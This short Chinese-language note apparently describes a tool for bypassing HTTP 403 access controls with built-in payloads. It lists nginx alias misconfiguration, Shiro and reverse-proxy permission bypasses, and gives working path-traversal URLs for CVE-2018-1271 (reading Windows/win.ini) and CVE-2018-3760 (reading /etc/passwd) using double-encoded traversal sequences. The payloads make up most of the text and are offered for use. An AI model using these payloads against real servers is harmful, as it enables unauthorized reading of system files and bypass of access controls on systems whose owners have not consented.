前言:bypass 403 利用工具
集成payload
nginx alias配置不当
CVE-2018-1271
http://0:8080/spring-rabbit-stock/static/%255c%255c%255c%255c%255c
%255c..%255c..%255c..%255c..%255c..%255c..%255c/Windows/win.ini
CVE-2018-3760
http://127.0.0.1:3000/assets/file:%2f%2f/app/assets/images
/%252e%252e/%252e%252e/%252e%252e/etc/passwd
shiro bypass permission bypass
参考文章:https://www.cnblogs.com/zpchcbd/p/15023056.html
reverse proxy architecture permission bypass
